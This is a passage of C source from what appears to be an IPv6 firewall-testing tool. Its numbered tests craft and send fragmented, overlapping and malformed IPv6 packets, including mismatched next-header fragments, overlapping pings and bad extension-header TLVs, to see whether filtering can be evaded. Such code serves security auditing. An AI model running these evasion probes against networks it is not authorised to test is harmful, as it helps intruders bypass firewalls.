pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type first (2nd)\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type first #2 (overlap)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); // interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0 thc_send_as_overlapping_first_fragment6(interface, src, dst, NXT_ICMP6, hdr->pkt + 40, hdr->pkt_len - 40, 1232, 0); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type first #3 (resend#2)\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, sport + count) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ECHOREQUEST, 0, count, (unsigned char *) &buf, 12, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; pkt = thc_destroy_packet(pkt); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) < 0) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type first #4 (resend#2L)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, sport + count) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ECHOREQUEST, 0, count, (unsigned char *) &buf, 0, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; pkt = thc_destroy_packet(pkt); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) < 0) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type middle+last\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type middle(first)+last\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type last\t\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type last #2\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); // interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0 thc_send_as_overlapping_last_fragment6(interface, src, dst, NXT_ICMP6, hdr->pkt + 40, hdr->pkt_len - 40, 1232, 0); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: overlapping ping first\t\t", count); poffset = 0; ptype = NXT_FRAG; memset(buf, 0, 1024); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt3, &pkt_len3, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt3, &pkt_len3, buf, 6) == -1) return -1; if (thc_add_icmp6(pkt3, &pkt_len3, ICMP6_ECHOREQUEST, 0, sport + count, buf, 8, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3) == -1) return -1; hdr3 = (thc_ipv6_hdr *) pkt3; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset, 16) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr->pkt + 40 + offset + 16, hdr->pkt_len - 40 - offset - 16) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 8 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset + 8, 24) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); pkt3 = thc_destroy_packet(pkt3); pingtest = 1; check_for_reply(); pingtest = 0; curr++; } if (only == ++count || only == 0) { printf("Test %2d: overlapping ping last\t\t", count); poffset = 0; ptype = NXT_FRAG; memset(buf, 0, 1024); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt3, &pkt_len3, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt3, &pkt_len3, buf, 6) == -1) return -1; if (thc_add_icmp6(pkt3, &pkt_len3, ICMP6_ECHOREQUEST, 0, sport + count, buf, 8, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3) == -1) return -1; hdr3 = (thc_ipv6_hdr *) pkt3; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset, 16) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 8 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset + 8, 24) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr->pkt + 40 + offset + 16, hdr->pkt_len - 40 - offset - 16) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); pkt3 = thc_destroy_packet(pkt3); pingtest = 1; check_for_reply(); pingtest = 0; curr++; } if (only == ++count || only == 0) { printf("Test %2d: resend 2nd fake pkt\t\t", count); poffset = 0; ptype = NXT_FRAG; memset(buf, 0, 1024); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 40) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 40) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt3, &pkt_len3, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt3, &pkt_len3, buf, 6) == -1) return -1; if (thc_add_icmp6(pkt3, &pkt_len3, ICMP6_ECHOREQUEST, 0, sport + count, buf, 32, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3) == -1) return -1; hdr3 = (thc_ipv6_hdr *) pkt3; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset, 16) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset + 16, 32) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr->pkt + 40 + offset + 16, 32) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 6, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr->pkt + 40 + offset + 48, hdr->pkt_len - 40 - offset - 48) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); pkt3 = thc_destroy_packet(pkt3); pingtest = 1; check_for_reply(); pingtest = 0; curr++; } if (only == ++count || only == 0) { printf("Test %2d: Bad TLV handling\t\t", count); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) == -1) return -1; buf[0] = 1; // T buf[1] = 12; // L if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 6) == -1) return -1; buf[0] = 1; // T buf[1] = 4; // L if (thc_add_hdr_dst(pkt2, &pkt_len2, buf, 6) == -1) return -1; if (thc_add_tcp(pkt2, &pkt_len2, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt2; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ECHOREQUEST, 0, count, hdr->pkt + hdr->pkt_len - 20, 20, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); pingtest = 1; check_for_reply(); pingtest = 0; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); memset(buf, 0, sizeof(buf)); curr++; } if (only == ++count || only == 0) { printf("Test %2d: Bad TLV handling #2\t\t", count); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; buf[0] = 1; // T buf[1] = 12; // L if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; buf[0] = 1; // T buf[1] = 12; // L buf[6] = NXT_TCP; // fake dst hdr buf[7] = 1; // 16 byte length of fake hdr, jumping over 8 byte of icmp hdr buf[8] = 1; // T fake buf[9] = 12; // L fake if (thc_add_hdr_dst(pkt, &pkt_len, buf, 14) == -1) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_tcp(pkt2, &pkt_len2, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt2; if (thc_add_icmp6(pkt, &pkt_len, 